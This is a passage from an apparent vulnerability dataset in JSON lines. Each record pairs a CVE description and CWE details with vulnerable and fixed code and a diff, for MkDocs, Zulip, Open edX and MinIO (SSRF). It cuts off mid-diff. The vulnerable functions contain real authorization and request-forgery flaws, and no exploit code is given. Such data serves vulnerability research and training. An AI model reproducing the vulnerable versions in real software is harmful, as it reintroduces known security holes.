self._epoch_cond.wait_for(lambda: self._visible_epoch == self._wanted_epoch)\n epoch = self._visible_epoch\n\n try:\n file = open(file_path, \"rb\")\n except OSError:\n return None # Not found\n\n if path.endswith(\".html\"):\n with file:\n content = file.read()\n content = self._inject_js_into_html(content, epoch)\n file = io.BytesIO(content)\n content_length = len(content)\n else:\n content_length = os.path.getsize(file_path)\n\n content_type = self._guess_type(file_path)\n start_response(\n \"200 OK\", [(\"Content-Type\", content_type), (\"Content-Length\", str(content_length))]\n )\n return wsgiref.util.FileWrapper(file)"}], "fix_func": [{"id": "fix_py_137_1", "commit": "1b15412", "file_path": "mkdocs/livereload/__init__.py", "start_line": 162, "end_line": 222, "snippet": " def _serve_request(self, environ, start_response):\n # https://bugs.python.org/issue16679\n # https://github.com/bottlepy/bottle/blob/f9b1849db4/bottle.py#L984\n path = environ[\"PATH_INFO\"].encode(\"latin-1\").decode(\"utf-8\", \"ignore\")\n\n m = re.fullmatch(r\"/livereload/([0-9]+)/[0-9]+\", path)\n if m:\n epoch = int(m[1])\n start_response(\"200 OK\", [(\"Content-Type\", \"text/plain\")])\n\n def condition():\n return self._visible_epoch > epoch\n\n with self._epoch_cond:\n if not condition():\n # Stall the browser, respond as soon as there's something new.\n # If there's not, respond anyway after a minute.\n self._log_poll_request(environ.get(\"HTTP_REFERER\"), request_id=path)\n self._epoch_cond.wait_for(condition, timeout=self.poll_response_timeout)\n return [b\"%d\" % self._visible_epoch]\n\n if path == \"/js/livereload.js\":\n file_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"livereload.js\")\n elif path.startswith(self.mount_path):\n rel_file_path = path[len(self.mount_path):].lstrip(\"/\")\n if path.endswith(\"/\"):\n rel_file_path += \"index.html\"\n file_path = os.path.join(self.root, rel_file_path)\n elif path == \"/\":\n start_response(\"302 Found\", [(\"Location\", self.mount_path)])\n return []\n else:\n return None # Not found\n\n # Wait until the ongoing rebuild (if any) finishes, so we're not serving a half-built site.\n with self._epoch_cond:\n self._epoch_cond.wait_for(lambda: self._visible_epoch == self._wanted_epoch)\n epoch = self._visible_epoch\n\n try:\n file = open(file_path, \"rb\")\n except OSError:\n if not path.endswith(\"/\") and os.path.isfile(os.path.join(file_path, \"index.html\")):\n start_response(\"302 Found\", [(\"Location\", path + \"/\")])\n return []\n return None # Not found\n\n if file_path.endswith(\".html\"):\n with file:\n content = file.read()\n content = self._inject_js_into_html(content, epoch)\n file = io.BytesIO(content)\n content_length = len(content)\n else:\n content_length = os.path.getsize(file_path)\n\n content_type = self._guess_type(file_path)\n start_response(\n \"200 OK\", [(\"Content-Type\", content_type), (\"Content-Length\", str(content_length))]\n )\n return wsgiref.util.FileWrapper(file)"}], "vul_patch": "--- a/mkdocs/livereload/__init__.py\n+++ b/mkdocs/livereload/__init__.py\n@@ -22,10 +22,10 @@\n if path == \"/js/livereload.js\":\n file_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"livereload.js\")\n elif path.startswith(self.mount_path):\n+ rel_file_path = path[len(self.mount_path):].lstrip(\"/\")\n if path.endswith(\"/\"):\n- path += \"index.html\"\n- path = path[len(self.mount_path):]\n- file_path = os.path.join(self.root, path.lstrip(\"/\"))\n+ rel_file_path += \"index.html\"\n+ file_path = os.path.join(self.root, rel_file_path)\n elif path == \"/\":\n start_response(\"302 Found\", [(\"Location\", self.mount_path)])\n return []\n@@ -40,9 +40,12 @@\n try:\n file = open(file_path, \"rb\")\n except OSError:\n+ if not path.endswith(\"/\") and os.path.isfile(os.path.join(file_path, \"index.html\")):\n+ start_response(\"302 Found\", [(\"Location\", path + \"/\")])\n+ return []\n return None # Not found\n \n- if path.endswith(\".html\"):\n+ if file_path.endswith(\".html\"):\n with file:\n content = file.read()\n content = self._inject_js_into_html(content, epoch)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-31168", "cve_description": "Zulip is an open source team chat tool. Due to an incorrect authorization check in Zulip Server 5.4 and earlier, a member of an organization could craft an API call that grants organization administrator privileges to one of their bots. The vulnerability is fixed in Zulip Server 5.5. Members who don\u2019t own any bots, and lack permission to create them, can\u2019t exploit the vulnerability. As a workaround for the vulnerability, an organization administrator can restrict the `Who can create bots` permission to administrators only, and change the ownership of existing bots.", "cwe_info": {"CWE-285": {"name": "Improper Authorization", "description": "The product does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action."}, "CWE-863": {"name": "Incorrect Authorization", "description": "The product performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check."}}, "repo": "https://github.com/zulip/zulip", "patch_url": ["https://github.com/zulip/zulip/commit/751b2a03e565e9eb02ffe923b7c24ac73d604034"], "programing_language": "Python", "vul_func": [{"id": "vul_py_409_1", "commit": "ad2ca0e6685f9aa46a1df1495fc08e73b98e1091", "file_path": "zerver/views/users.py", "start_line": 172, "end_line": 231, "snippet": "def update_user_backend(\n request: HttpRequest,\n user_profile: UserProfile,\n user_id: int,\n full_name: Optional[str] = REQ(default=None),\n role: Optional[int] = REQ(\n default=None,\n json_validator=check_int_in(\n UserProfile.ROLE_TYPES,\n ),\n ),\n profile_data: Optional[List[Dict[str, Optional[Union[int, ProfileDataElementValue]]]]] = REQ(\n default=None,\n json_validator=check_profile_data,\n ),\n) -> HttpResponse:\n target = access_user_by_id(\n user_profile, user_id, allow_deactivated=True, allow_bots=True, for_admin=True\n )\n\n if role is not None and target.role != role:\n # Require that the current user has permissions to\n # grant/remove the role in question. access_user_by_id has\n # already verified we're an administrator; here we enforce\n # that only owners can toggle the is_realm_owner flag.\n #\n # Logic replicated in patch_bot_backend.\n if UserProfile.ROLE_REALM_OWNER in [role, target.role] and not user_profile.is_realm_owner:\n raise OrganizationOwnerRequired()\n\n if target.role == UserProfile.ROLE_REALM_OWNER and check_last_owner(target):\n raise JsonableError(\n _(\"The owner permission cannot be removed from the only organization owner.\")\n )\n do_change_user_role(target, role, acting_user=user_profile)\n\n if full_name is not None and target.full_name != full_name and full_name.strip() != \"\":\n # We don't respect `name_changes_disabled` here because the request\n # is on behalf of the administrator.\n check_change_full_name(target, full_name, user_profile)\n\n if profile_data is not None:\n clean_profile_data: List[ProfileDataElementUpdateDict] = []\n for entry in profile_data:\n assert isinstance(entry[\"id\"], int)\n assert not isinstance(entry[\"value\"], int)\n if entry[\"value\"] is None or not entry[\"value\"]:\n field_id = entry[\"id\"]\n check_remove_custom_profile_field_value(target, field_id)\n else:\n clean_profile_data.append(\n {\n \"id\": entry[\"id\"],\n \"value\": entry[\"value\"],\n }\n )\n validate_user_custom_profile_data(target.realm.id, clean_profile_data)\n do_update_user_custom_profile_data_if_changed(target, clean_profile_data)\n\n return json_success(request)"}, {"id": "vul_py_409_2", "commit": "ad2ca0e6685f9aa46a1df1495fc08e73b98e1091", "file_path": "zerver/views/users.py", "start_line": 304, "end_line": 404, "snippet": "def patch_bot_backend(\n request: HttpRequest,\n user_profile: UserProfile,\n bot_id: int,\n full_name: Optional[str] = REQ(default=None),\n role: Optional[int] = REQ(\n default=None,\n json_validator=check_int_in(\n UserProfile.ROLE_TYPES,\n ),\n ),\n bot_owner_id: Optional[int] = REQ(json_validator=check_int, default=None),\n config_data: Optional[Dict[str, str]] = REQ(\n default=None, json_validator=check_dict(value_validator=check_string)\n ),\n service_payload_url: Optional[str] = REQ(json_validator=check_url, default=None),\n service_interface: int = REQ(json_validator=check_int, default=1),\n default_sending_stream: Optional[str] = REQ(default=None),\n default_events_register_stream: Optional[str] = REQ(default=None),\n default_all_public_streams: Optional[bool] = REQ(default=None, json_validator=check_bool),\n) -> HttpResponse:\n bot = access_bot_by_id(user_profile, bot_id)\n\n if full_name is not None:\n check_change_bot_full_name(bot, full_name, user_profile)\n\n if role is not None and bot.role != role:\n # Logic duplicated from update_user_backend.\n if UserProfile.ROLE_REALM_OWNER in [role, bot.role] and not user_profile.is_realm_owner:\n raise OrganizationOwnerRequired()\n\n do_change_user_role(bot, role, acting_user=user_profile)\n\n if bot_owner_id is not None:\n try:\n owner = get_user_profile_by_id_in_realm(bot_owner_id, user_profile.realm)\n except UserProfile.DoesNotExist:\n raise JsonableError(_(\"Failed to change owner, no such user\"))\n if not owner.is_active:\n raise JsonableError(_(\"Failed to change owner, user is deactivated\"))\n if owner.is_bot:\n raise JsonableError(_(\"Failed to change owner, bots can't own other bots\"))\n\n previous_owner = bot.bot_owner\n if previous_owner != owner:\n do_change_bot_owner(bot, owner, user_profile)\n\n if default_sending_stream is not None:\n if default_sending_stream == \"\":\n stream: Optional[Stream] = None\n else:\n (stream, sub) = access_stream_by_name(user_profile, default_sending_stream)\n do_change_default_sending_stream(bot, stream, acting_user=user_profile)\n if default_events_register_stream is not None:\n if default_events_register_stream == \"\":\n stream = None\n else:\n (stream, sub) = access_stream_by_name(user_profile, default_events_register_stream)\n do_change_default_events_register_stream(bot, stream, acting_user=user_profile)\n if default_all_public_streams is not None:\n do_change_default_all_public_streams(\n bot, default_all_public_streams, acting_user=user_profile\n )\n\n if service_payload_url is not None:\n check_valid_interface_type(service_interface)\n assert service_interface is not None\n do_update_outgoing_webhook_service(bot, service_interface, service_payload_url)\n\n if config_data is not None:\n do_update_bot_config_data(bot, config_data)\n\n if len(request.FILES) == 0:\n pass\n elif len(request.FILES) == 1:\n user_file = list(request.FILES.values())[0]\n assert isinstance(user_file, UploadedFile)\n assert user_file.size is not None\n upload_avatar_image(user_file, user_profile, bot)\n avatar_source = UserProfile.AVATAR_FROM_USER\n do_change_avatar_fields(bot, avatar_source, acting_user=user_profile)\n else:\n raise JsonableError(_(\"You may only upload one file at a time\"))\n\n json_result = dict(\n full_name=bot.full_name,\n avatar_url=avatar_url(bot),\n service_interface=service_interface,\n service_payload_url=service_payload_url,\n config_data=config_data,\n default_sending_stream=get_stream_name(bot.default_sending_stream),\n default_events_register_stream=get_stream_name(bot.default_events_register_stream),\n default_all_public_streams=bot.default_all_public_streams,\n )\n\n # Don't include the bot owner in case it is not set.\n # Default bots have no owner.\n if bot.bot_owner is not None:\n json_result[\"bot_owner\"] = bot.bot_owner.email\n\n return json_success(request, data=json_result)"}], "fix_func": [{"id": "fix_py_409_1", "commit": "751b2a03e565e9eb02ffe923b7c24ac73d604034", "file_path": "zerver/views/users.py", "start_line": 173, "end_line": 232, "snippet": "def update_user_backend(\n request: HttpRequest,\n user_profile: UserProfile,\n user_id: int,\n full_name: Optional[str] = REQ(default=None),\n role: Optional[int] = REQ(\n default=None,\n json_validator=check_int_in(\n UserProfile.ROLE_TYPES,\n ),\n ),\n profile_data: Optional[List[Dict[str, Optional[Union[int, ProfileDataElementValue]]]]] = REQ(\n default=None,\n json_validator=check_profile_data,\n ),\n) -> HttpResponse:\n target = access_user_by_id(\n user_profile, user_id, allow_deactivated=True, allow_bots=True, for_admin=True\n )\n\n if role is not None and target.role != role:\n # Require that the current user has permissions to\n # grant/remove the role in question.\n #\n # Logic replicated in patch_bot_backend.\n if UserProfile.ROLE_REALM_OWNER in [role, target.role] and not user_profile.is_realm_owner:\n raise OrganizationOwnerRequired()\n elif not user_profile.is_realm_admin:\n raise OrganizationAdministratorRequired()\n\n if target.role == UserProfile.ROLE_REALM_OWNER and check_last_owner(target):\n raise JsonableError(\n _(\"The owner permission cannot be removed from the only organization owner.\")\n )\n do_change_user_role(target, role, acting_user=user_profile)\n\n if full_name is not None and target.full_name != full_name and full_name.strip() != \"\":\n # We don't respect `name_changes_disabled` here because the request\n # is on behalf of the administrator.\n check_change_full_name(target, full_name, user_profile)\n\n if profile_data is not None:\n clean_profile_data: List[ProfileDataElementUpdateDict] = []\n for entry in profile_data:\n assert isinstance(entry[\"id\"], int)\n assert not isinstance(entry[\"value\"], int)\n if entry[\"value\"] is None or not entry[\"value\"]:\n field_id = entry[\"id\"]\n check_remove_custom_profile_field_value(target, field_id)\n else:\n clean_profile_data.append(\n {\n \"id\": entry[\"id\"],\n \"value\": entry[\"value\"],\n }\n )\n validate_user_custom_profile_data(target.realm.id, clean_profile_data)\n do_update_user_custom_profile_data_if_changed(target, clean_profile_data)\n\n return json_success(request)"}, {"id": "fix_py_409_2", "commit": "751b2a03e565e9eb02ffe923b7c24ac73d604034", "file_path": "zerver/views/users.py", "start_line": 305, "end_line": 407, "snippet": "def patch_bot_backend(\n request: HttpRequest,\n user_profile: UserProfile,\n bot_id: int,\n full_name: Optional[str] = REQ(default=None),\n role: Optional[int] = REQ(\n default=None,\n json_validator=check_int_in(\n UserProfile.ROLE_TYPES,\n ),\n ),\n bot_owner_id: Optional[int] = REQ(json_validator=check_int, default=None),\n config_data: Optional[Dict[str, str]] = REQ(\n default=None, json_validator=check_dict(value_validator=check_string)\n ),\n service_payload_url: Optional[str] = REQ(json_validator=check_url, default=None),\n service_interface: int = REQ(json_validator=check_int, default=1),\n default_sending_stream: Optional[str] = REQ(default=None),\n default_events_register_stream: Optional[str] = REQ(default=None),\n default_all_public_streams: Optional[bool] = REQ(default=None, json_validator=check_bool),\n) -> HttpResponse:\n bot = access_bot_by_id(user_profile, bot_id)\n\n if full_name is not None:\n check_change_bot_full_name(bot, full_name, user_profile)\n\n if role is not None and bot.role != role:\n # Logic duplicated from update_user_backend.\n if UserProfile.ROLE_REALM_OWNER in [role, bot.role] and not user_profile.is_realm_owner:\n raise OrganizationOwnerRequired()\n elif not user_profile.is_realm_admin:\n raise OrganizationAdministratorRequired()\n\n do_change_user_role(bot, role, acting_user=user_profile)\n\n if bot_owner_id is not None:\n try:\n owner = get_user_profile_by_id_in_realm(bot_owner_id, user_profile.realm)\n except UserProfile.DoesNotExist:\n raise JsonableError(_(\"Failed to change owner, no such user\"))\n if not owner.is_active:\n raise JsonableError(_(\"Failed to change owner, user is deactivated\"))\n if owner.is_bot:\n raise JsonableError(_(\"Failed to change owner, bots can't own other bots\"))\n\n previous_owner = bot.bot_owner\n if previous_owner != owner:\n do_change_bot_owner(bot, owner, user_profile)\n\n if default_sending_stream is not None:\n if default_sending_stream == \"\":\n stream: Optional[Stream] = None\n else:\n (stream, sub) = access_stream_by_name(user_profile, default_sending_stream)\n do_change_default_sending_stream(bot, stream, acting_user=user_profile)\n if default_events_register_stream is not None:\n if default_events_register_stream == \"\":\n stream = None\n else:\n (stream, sub) = access_stream_by_name(user_profile, default_events_register_stream)\n do_change_default_events_register_stream(bot, stream, acting_user=user_profile)\n if default_all_public_streams is not None:\n do_change_default_all_public_streams(\n bot, default_all_public_streams, acting_user=user_profile\n )\n\n if service_payload_url is not None:\n check_valid_interface_type(service_interface)\n assert service_interface is not None\n do_update_outgoing_webhook_service(bot, service_interface, service_payload_url)\n\n if config_data is not None:\n do_update_bot_config_data(bot, config_data)\n\n if len(request.FILES) == 0:\n pass\n elif len(request.FILES) == 1:\n user_file = list(request.FILES.values())[0]\n assert isinstance(user_file, UploadedFile)\n assert user_file.size is not None\n upload_avatar_image(user_file, user_profile, bot)\n avatar_source = UserProfile.AVATAR_FROM_USER\n do_change_avatar_fields(bot, avatar_source, acting_user=user_profile)\n else:\n raise JsonableError(_(\"You may only upload one file at a time\"))\n\n json_result = dict(\n full_name=bot.full_name,\n avatar_url=avatar_url(bot),\n service_interface=service_interface,\n service_payload_url=service_payload_url,\n config_data=config_data,\n default_sending_stream=get_stream_name(bot.default_sending_stream),\n default_events_register_stream=get_stream_name(bot.default_events_register_stream),\n default_all_public_streams=bot.default_all_public_streams,\n )\n\n # Don't include the bot owner in case it is not set.\n # Default bots have no owner.\n if bot.bot_owner is not None:\n json_result[\"bot_owner\"] = bot.bot_owner.email\n\n return json_success(request, data=json_result)"}], "vul_patch": "--- a/zerver/views/users.py\n+++ b/zerver/views/users.py\n@@ -20,13 +20,13 @@\n \n if role is not None and target.role != role:\n # Require that the current user has permissions to\n- # grant/remove the role in question. access_user_by_id has\n- # already verified we're an administrator; here we enforce\n- # that only owners can toggle the is_realm_owner flag.\n+ # grant/remove the role in question.\n #\n # Logic replicated in patch_bot_backend.\n if UserProfile.ROLE_REALM_OWNER in [role, target.role] and not user_profile.is_realm_owner:\n raise OrganizationOwnerRequired()\n+ elif not user_profile.is_realm_admin:\n+ raise OrganizationAdministratorRequired()\n \n if target.role == UserProfile.ROLE_REALM_OWNER and check_last_owner(target):\n raise JsonableError(\n\n--- a/zerver/views/users.py\n+++ b/zerver/views/users.py\n@@ -28,6 +28,8 @@\n # Logic duplicated from update_user_backend.\n if UserProfile.ROLE_REALM_OWNER in [role, bot.role] and not user_profile.is_realm_owner:\n raise OrganizationOwnerRequired()\n+ elif not user_profile.is_realm_admin:\n+ raise OrganizationAdministratorRequired()\n \n do_change_user_role(bot, role, acting_user=user_profile)\n \n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-22209", "cve_description": "Open edX Platform is a service-oriented platform for authoring and delivering online learning. A user with a JWT and more limited scopes could call endpoints exceeding their access. This vulnerability has been patched in commit 019888f.", "cwe_info": {"CWE-284": {"name": "Improper Access Control", "description": "The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor."}}, "repo": "https://github.com/openedx/edx-platform", "patch_url": ["https://github.com/openedx/edx-platform/commit/019888f3d15beaebcb7782934f6c43b0c2b3735e"], "programing_language": "Python", "vul_func": [{"id": "vul_py_293_1", "commit": "e7fc0c6", "file_path": "lms/djangoapps/courseware/block_render.py", "start_line": 737, "end_line": 795, "snippet": "def handle_xblock_callback(request, course_id, usage_id, handler, suffix=None):\n \"\"\"\n Generic view for extensions. This is where AJAX calls go.\n\n Arguments:\n request (Request): Django request.\n course_id (str): Course containing the block\n usage_id (str)\n handler (str)\n suffix (str)\n\n Raises:\n HttpResponseForbidden: If the request method is not `GET` and user is not authenticated.\n Http404: If the course is not found in the modulestore.\n \"\"\"\n # In this case, we are using Session based authentication, so we need to check CSRF token.\n if request.user.is_authenticated:\n error = CsrfViewMiddleware(get_response=lambda request: None).process_view(request, None, (), {})\n if error:\n return error\n\n # We are reusing DRF logic to provide support for JWT and Oauth2. We abandoned the idea of using DRF view here\n # to avoid introducing backwards-incompatible changes.\n # You can see https://github.com/openedx/XBlock/pull/383 for more details.\n else:\n authentication_classes = (JwtAuthentication, BearerAuthenticationAllowInactiveUser)\n authenticators = [auth() for auth in authentication_classes]\n\n for authenticator in authenticators:\n try:\n user_auth_tuple = authenticator.authenticate(request)\n except APIException:\n log.exception(\n \"XBlock handler %r failed to authenticate with %s\", handler, authenticator.__class__.__name__\n )\n else:\n if user_auth_tuple is not None:\n request.user, _ = user_auth_tuple\n break\n\n # NOTE (CCB): Allow anonymous GET calls (e.g. for transcripts). Modifying this view is simpler than updating\n # the XBlocks to use `handle_xblock_callback_noauth`, which is practically identical to this view.\n if request.method != 'GET' and not (request.user and request.user.is_authenticated):\n return HttpResponseForbidden('Unauthenticated')\n\n request.user.known = request.user.is_authenticated\n\n try:\n course_key = CourseKey.from_string(course_id)\n except InvalidKeyError:\n raise Http404(f'{course_id} is not a valid course key') # lint-amnesty, pylint: disable=raise-missing-from\n\n with modulestore().bulk_operations(course_key):\n try:\n course = modulestore().get_course(course_key)\n except ItemNotFoundError:\n raise Http404(f'{course_id} does not exist in the modulestore') # lint-amnesty, pylint: disable=raise-missing-from\n\n return _invoke_xblock_handler(request, course_id, usage_id, handler, suffix, course=course)"}], "fix_func": [{"id": "fix_py_293_1", "commit": "019888f3d15beaebcb7782934f6c43b0c2b3735e", "file_path": "lms/djangoapps/courseware/block_render.py", "start_line": 738, "end_line": 803, "snippet": "def handle_xblock_callback(request, course_id, usage_id, handler, suffix=None):\n \"\"\"\n Generic view for extensions. This is where AJAX calls go.\n\n Arguments:\n request (Request): Django request.\n course_id (str): Course containing the block\n usage_id (str)\n handler (str)\n suffix (str)\n\n Raises:\n HttpResponseForbidden: If the request method is not `GET` and user is not authenticated.\n Http404: If the course is not found in the modulestore.\n \"\"\"\n # In this case, we are using Session based authentication, so we need to check CSRF token.\n if request.user.is_authenticated:\n error = CsrfViewMiddleware(get_response=lambda request: None).process_view(request, None, (), {})\n if error:\n return error\n\n # We are reusing DRF logic to provide support for JWT and Oauth2. We abandoned the idea of using DRF view here\n # to avoid introducing backwards-incompatible changes.\n # You can see https://github.com/openedx/XBlock/pull/383 for more details.\n else:\n authentication_classes = (JwtAuthentication, BearerAuthenticationAllowInactiveUser)\n authenticators = [auth() for auth in authentication_classes]\n\n for authenticator in authenticators:\n try:\n user_auth_tuple = authenticator.authenticate(request)\n except APIException:\n log.exception(\n \"XBlock handler %r failed to authenticate with %s\", handler, authenticator.__class__.__name__\n )\n else:\n if user_auth_tuple is not None:\n # When using JWT authentication, the second element contains the JWT token. We need it to determine\n # whether the application that issued the token is restricted.\n request.user, request.auth = user_auth_tuple\n # This is verified by the `JwtRestrictedApplication` before it decodes the token.\n request.successful_authenticator = authenticator\n break\n\n # NOTE (CCB): Allow anonymous GET calls (e.g. for transcripts). Modifying this view is simpler than updating\n # the XBlocks to use `handle_xblock_callback_noauth`, which is practically identical to this view.\n # Block all request types coming from restricted applications.\n if (\n request.method != 'GET' and not (request.user and request.user.is_authenticated)\n ) or JwtRestrictedApplication().has_permission(request, None): # type: ignore\n return HttpResponseForbidden('Unauthenticated')\n\n request.user.known = request.user.is_authenticated\n\n try:\n course_key = CourseKey.from_string(course_id)\n except InvalidKeyError:\n raise Http404(f'{course_id} is not a valid course key') # lint-amnesty, pylint: disable=raise-missing-from\n\n with modulestore().bulk_operations(course_key):\n try:\n course = modulestore().get_course(course_key)\n except ItemNotFoundError:\n raise Http404(f'{course_id} does not exist in the modulestore') # lint-amnesty, pylint: disable=raise-missing-from\n\n return _invoke_xblock_handler(request, course_id, usage_id, handler, suffix, course=course)"}], "vul_patch": "--- a/lms/djangoapps/courseware/block_render.py\n+++ b/lms/djangoapps/courseware/block_render.py\n@@ -35,12 +35,19 @@\n )\n else:\n if user_auth_tuple is not None:\n- request.user, _ = user_auth_tuple\n+ # When using JWT authentication, the second element contains the JWT token. We need it to determine\n+ # whether the application that issued the token is restricted.\n+ request.user, request.auth = user_auth_tuple\n+ # This is verified by the `JwtRestrictedApplication` before it decodes the token.\n+ request.successful_authenticator = authenticator\n break\n \n # NOTE (CCB): Allow anonymous GET calls (e.g. for transcripts). Modifying this view is simpler than updating\n # the XBlocks to use `handle_xblock_callback_noauth`, which is practically identical to this view.\n- if request.method != 'GET' and not (request.user and request.user.is_authenticated):\n+ # Block all request types coming from restricted applications.\n+ if (\n+ request.method != 'GET' and not (request.user and request.user.is_authenticated)\n+ ) or JwtRestrictedApplication().has_permission(request, None): # type: ignore\n return HttpResponseForbidden('Unauthenticated')\n \n request.user.known = request.user.is_authenticated\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-21287", "cve_description": "MinIO is a High Performance Object Storage released under Apache License v2.0. In MinIO before version RELEASE.2021-01-30T00-20-58Z there is a server-side request forgery vulnerability. The target application may have functionality for importing data from a URL, publishing data to a URL, or otherwise reading data from a URL that can be tampered with. The attacker modifies the calls to this functionality by supplying a completely different URL or by manipulating how URLs are built (path traversal etc.). In a Server-Side Request Forgery (SSRF) attack, the attacker can abuse functionality on the server to read or update internal resources. The attacker can supply or modify a URL which the code running on the server will read or submit data, and by carefully selecting the URLs, the attacker may be able to read server configuration such as AWS metadata, connect to internal services like HTTP enabled databases, or perform post requests towards internal services which are not intended to be exposed. This is fixed in version RELEASE.2021-01-30T00-20-58Z, all users are advised to upgrade. As a workaround you can disable the browser front-end with \"MINIO_BROWSER=off\" environment variable.", "cwe_info": {"CWE-918": {"name": "Server-Side Request Forgery (SSRF)", "description": "The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination."}}, "repo": "https://github.com/minio/minio", "patch_url": ["https://github.com/minio/minio/commit/eb6871ecd960d570f70698877209e6db181bf276"], "programing_language": "Go", "vul_func": [{"id": "vul_go_137_1", "commit": "9cdd981", "file_path": "cmd/web-handlers.go", "start_line": 2206, "end_line": 2255, "snippet": "func (web *webAPIHandlers) LoginSTS(r *http.Request, args *LoginSTSArgs, reply *LoginRep) error {\n\tctx := newWebContext(r, args, \"WebLoginSTS\")\n\n\tv := url.Values{}\n\tv.Set(\"Action\", webIdentity)\n\tv.Set(\"WebIdentityToken\", args.Token)\n\tv.Set(\"Version\", stsAPIVersion)\n\n\tscheme := \"http\"\n\tif sourceScheme := handlers.GetSourceScheme(r); sourceScheme != \"\" {\n\t\tscheme = sourceScheme\n\t}\n\tif globalIsTLS {\n\t\tscheme = \"https\"\n\t}\n\n\tu := &url.URL{\n\t\tScheme: scheme,\n\t\tHost: r.Host,\n\t}\n\n\tu.RawQuery = v.Encode()\n\n\treq, err := http.NewRequest(http.MethodPost, u.String(), nil)\n\tif err != nil {\n\t\treturn toJSONError(ctx, err)\n\t}\n\n\tclnt := &http.Client{\n\t\tTransport: NewGatewayHTTPTransport(),\n\t}\n\tresp, err := clnt.Do(req)\n\tif err != nil {\n\t\treturn toJSONError(ctx, err)\n\t}\n\tdefer xhttp.DrainBody(resp.Body)\n\n\tif resp.StatusCode != http.StatusOK {\n\t\treturn toJSONError(ctx, errors.New(resp.Status))\n\t}\n\n\ta := AssumeRoleWithWebIdentityResponse{}\n\tif err = xml.NewDecoder(resp.Body).Decode(&a); err != nil {\n\t\treturn toJSONError(ctx, err)\n\t}\n\n\treply.Token = a.Result.Credentials.SessionToken\n\treply.UIVersion = browser.UIVersion\n\treturn nil\n}"}], "fix_func": [{"id": "fix_go_137_1", "commit": "eb6871e", "file_path": "cmd/web-handlers.go", "start_line": 2207, "end_line": 2261, "snippet": "func (web *webAPIHandlers) LoginSTS(r *http.Request, args *LoginSTSArgs, reply *LoginRep) error {\n\tctx := newWebContext(r, args, \"WebLoginSTS\")\n\n\tif globalOpenIDValidators == nil {\n\t\treturn toJSONError(ctx, errSTSNotInitialized)\n\t}\n\n\tv, err := globalOpenIDValidators.Get(\"jwt\")\n\tif err != nil {\n\t\tlogger.LogIf(ctx, err)\n\t\treturn toJSONError(ctx, errSTSNotInitialized)\n\t}\n\n\tm, err := v.Validate(args.Token, \"\")\n\tif err != nil {\n\t\treturn toJSONError(ctx, err)\n\t}\n\n\t// JWT has requested a custom claim with policy value set.\n\t// This is a MinIO STS API specific value, this value should\n\t// be set and configured on your identity provider as part of\n\t// JWT custom claims.\n\tvar policyName string\n\tpolicySet, ok := iampolicy.GetPoliciesFromClaims(m, iamPolicyClaimNameOpenID())\n\tif ok {\n\t\tpolicyName = globalIAMSys.CurrentPolicies(strings.Join(policySet.ToSlice(), \",\"))\n\t}\n\tif policyName == \"\" && globalPolicyOPA == nil {\n\t\treturn toJSONError(ctx, fmt.Errorf(\"%s claim missing from the JWT token, credentials will not be generated\", iamPolicyClaimNameOpenID()))\n\t}\n\tm[iamPolicyClaimNameOpenID()] = policyName\n\n\tsecret := globalActiveCred.SecretKey\n\tcred, err := auth.GetNewCredentialsWithMetadata(m, secret)\n\tif err != nil {\n\t\treturn toJSONError(ctx, err)\n\t}\n\n\t// Set the newly generated credentials.\n\tif err = globalIAMSys.SetTempUser(cred.AccessKey, cred, policyName); err != nil {\n\t\treturn toJSONError(ctx, err)\n\t}\n\n\t// Notify all other MinIO peers to reload temp users\n\tfor _, nerr := range globalNotificationSys.LoadUser(cred.AccessKey, true) {\n\t\tif nerr.Err != nil {\n\t\t\tlogger.GetReqInfo(ctx).SetTags(\"peerAddress\", nerr.Host.String())\n\t\t\tlogger.LogIf(ctx, nerr.Err)\n\t\t}\n\t}\n\n\treply.Token = cred.SessionToken\n\treply.UIVersion = browser.UIVersion\n\treturn nil\n}"}, {"id": "fix_go_137_2", "commit": "eb6871e", "file_path": "cmd/web-handlers.go", "start_line": 2204, "end_line": 2204, "snippet": "var errSTSNotInitialized = errors.New(\"STS API not initialized, please configure STS support\")"}], "vul_patch": "--- a/cmd/web-handlers.go\n+++ b/cmd/web-handlers.go\n@@ -1,50 +1,55 @@\n func (web *webAPIHandlers) LoginSTS(r *http.Request, args *LoginSTSArgs, reply *LoginRep) error {\n \tctx := newWebContext(r, args, \"WebLoginSTS\")\n \n-\tv := url.Values{}\n-\tv.Set(\"Action\", webIdentity)\n-\tv.Set(\"WebIdentityToken\", args.Token)\n-\tv.Set(\"Version\", stsAPIVersion)\n-\n-\tscheme := \"http\"\n-\tif sourceScheme := handlers.GetSourceScheme(r); sourceScheme != \"\" {\n-\t\tscheme = sourceScheme\n-\t}\n-\tif globalIsTLS {\n-\t\tscheme = \"https\"\n+\tif globalOpenIDValidators == nil {\n+\t\treturn toJSONError(ctx, errSTSNotInitialized)\n \t}\n \n-\tu := &url.URL{\n-\t\tScheme: scheme,\n-\t\tHost: r.Host,\n+\tv, err := globalOpenIDValidators.Get(\"jwt\")\n+\tif err != nil {\n+\t\tlogger.LogIf(ctx, err)\n+\t\treturn toJSONError(ctx, errSTSNotInitialized)\n \t}\n \n-\tu.RawQuery = v.Encode()\n-\n-\treq, err := http.NewRequest(http.MethodPost, u.String(), nil)\n+\tm, err := v.Validate(args.Token, \"\")\n \tif err != nil {\n \t\treturn toJSONError(ctx, err)\n \t}\n \n-\tclnt := &http.Client{\n-\t\tTransport: NewGatewayHTTPTransport(),\n+\t// JWT has requested a custom claim with policy value set.\n+\t// This is a MinIO STS API specific value, this value should\n+\t// be set and configured on your identity provider as part of\n+\t// JWT custom claims.\n+\tvar policyName string\n+\tpolicySet, ok := iampolicy.GetPoliciesFromClaims(m, iamPolicyClaimNameOpenID())\n+\tif ok {\n+\t\tpolicyName = globalIAMSys.CurrentPolicies(strings.Join(policySet.ToSlice(), \",\"))\n \t}\n-\tresp, err := clnt.Do(req)\n+\tif policyName == \"\" && globalPolicyOPA == nil {\n+\t\treturn toJSONError(ctx, fmt.Errorf(\"%s claim missing from the JWT 